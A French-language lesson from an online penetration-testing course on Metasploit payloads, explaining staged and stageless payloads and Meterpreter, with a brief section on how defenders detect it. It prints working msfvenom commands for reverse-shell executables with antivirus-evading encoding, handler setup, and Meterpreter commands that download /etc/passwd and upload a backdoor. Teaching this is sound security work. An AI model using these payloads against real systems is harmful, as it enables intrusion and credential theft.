Charges utiles : avec ou sans étapes, Meterpreter
Choisissez la charge utile adaptée à un scénario et utilisez Meterpreter après l’exploitation.
Charges utiles : avec ou sans étapes, Meterpreter est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 3 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu’est-ce qu’une charge utile ?
Une charge utile est le code qui s’exécute sur la cible après une exploitation réussie. Elle définit ce que l’attaquant obtient : un interpréteur de commandes, l’exécution de commandes, l’accès aux fichiers ou un agent complet comme Meterpreter.
Charges utiles à étapes ou sans étape
Les charges utiles sans étape (/) contiennent tout dans un seul fichier binaire : elles sont plus volumineuses, mais plus simples, et n’ont pas besoin de rappel réseau après la fourniture initiale. Les charges utiles à étapes (//) envoient d’abord un petit programme de démarrage qui télécharge la deuxième étape depuis le gestionnaire.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsQuand utiliser chacune
Utilisez une charge utile sans étape lorsque la cible n’a plus accès à Internet ou au gestionnaire après l’exploitation initiale : la charge utile doit être autonome. Utilisez une charge utile à étapes lorsque vous souhaitez une charge utile initiale plus petite et disposez d’une connexion fiable au gestionnaire.
Présentation de Meterpreter
Meterpreter est la charge utile avancée de Metasploit : il s’exécute entièrement en mémoire, chiffre les communications et fournit une interface de programmation complète : accès au système de fichiers, migration de processus, enregistrement des frappes, capture d’écran et pivotement.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runCommandes Meterpreter
Commandes Meterpreter essentielles pour l’après-exploitation : informations système, liste des processus, opérations sur les fichiers et réseau.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellMigration de processus
Migrez le processus Meterpreter vers un processus plus stable ou moins suspect (par exemple, explorer.exe sous Windows). Cela peut également élever les privilèges si la migration cible un processus disposant de privilèges supérieurs.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsGénérer des charges utiles avec msfvenom
msfvenom génère des fichiers de charges utiles autonomes (EXE, ELF, APK et code shell) destinés à être fournis par hameçonnage, par dépôt sur USB ou par des interpréteurs de commandes web lors d’évaluations autorisées.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/handler pour intercepter les interpréteurs de commandes
Le module auxiliaire multi/handler intercepte les connexions inversées. Configurez-le avec la même charge utile, LHOST et LPORT que ceux utilisés dans msfvenom avant de fournir la charge utile.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobNotions de base sur l’encodage et l’évasion
Les encodeurs de msfvenom peuvent obfusquer les charges utiles afin d’échapper à la détection de base d’AV fondée sur les signatures. Remarque : les solutions EDR modernes utilisent la détection comportementale ; les encodeurs seuls sont insuffisants contre les défenses avancées.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeCharges utiles inversées ou en écoute
Les charges utiles inversées se connectent de la cible vers l’attaquant, ce qui est préférable avec NAT ou des pare-feu. Les charges utiles en écoute attendent sur la cible : l’attaquant s’y connecte. Le mode inversé est préférable dans la plupart des situations.
Détection des charges utiles par les défenseurs
Les défenseurs détectent Meterpreter grâce aux signatures réseau (profils du trafic de commande et de contrôle), à l’analyse mémoire (artefacts d’injection réflexive de DLL) et à l’analyse comportementale (creusement de processus et relations parent-enfant inhabituelles).
Vérification rapide
Qu’est-ce qui distingue une charge utile à étapes d’une charge utile sans étape dans Metasploit ?
Résumé : charges utiles et Meterpreter
Choisissez les charges utiles à étapes pour une faible empreinte initiale et les charges utiles sans étape pour une fourniture autonome. Meterpreter est la charge utile la plus complète pour l’après-exploitation : elle s’exécute en mémoire, chiffre ses communications et peut être étendue. Utilisez msfvenom pour générer des fichiers binaires autonomes et configurez toujours multi/handler pour intercepter les connexions de rappel.
Questions Fréquemment Posées
La leçon « Charges utiles : avec ou sans étapes, Meterpreter » est-elle gratuite ?
Oui — le texte complet de « Charges utiles : avec ou sans étapes, Meterpreter » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Charges utiles : avec ou sans étapes, Meterpreter » ?
Choisissez la charge utile adaptée à un scénario et utilisez Meterpreter après l’exploitation. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 3 sur 4.
Combien de temps prend la leçon « Charges utiles : avec ou sans étapes, Meterpreter » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Architecture de Metasploit et msfconsole
- Exploiter une vulnérabilité connue
- Charges utiles : avec ou sans étapes, Meterpreter
- Après l’exploitation : pivoter et persister